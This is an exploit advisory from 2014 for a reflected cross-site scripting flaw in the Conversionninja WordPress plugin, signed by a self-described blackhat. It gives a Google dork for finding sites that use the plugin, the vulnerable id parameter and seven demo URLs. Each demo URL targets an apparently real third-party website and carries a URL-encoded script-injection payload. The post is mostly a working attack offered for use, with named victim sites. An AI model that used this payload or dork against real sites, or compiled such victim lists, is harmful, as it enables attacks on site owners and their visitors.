[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Exploit Title: Wordpress Plugin Conversionninja Cross Site Scripting [+] [+] Exploit Author: Ashiyane Digital Security Team [+] [+] Date: 2014-05-22 [+] [+] Google Dork : inurl:wp-content/plugins/conversionninja [+] [+] Vendor Homepage : http://www.Wordpress.org [+] [+] Tested on: Windows 7 , Mozilla FireFox [+] [+] Discovered By : Milad Hacking [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Location : [localhost]/wp-content/plugins/conversionninja/lp/index.php?id=[XSS] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Demo : http://mlmX18.de/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E http://www.digitXaler-kabelanschluss.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E http://www.schXwarzer-adler-feucht.de/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E http://bestverXtrieb.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E http://gratis-weXbinare.eu/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E http://www.salsXa-online-academy.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E http://dasleadsystXem.eu/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Discovered By : Milad Hacking We Love Mohammad Mail : milad.hacking.blackhat@gmail.com Home Page : https://www.facebook.com/milad.hacking.5 [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]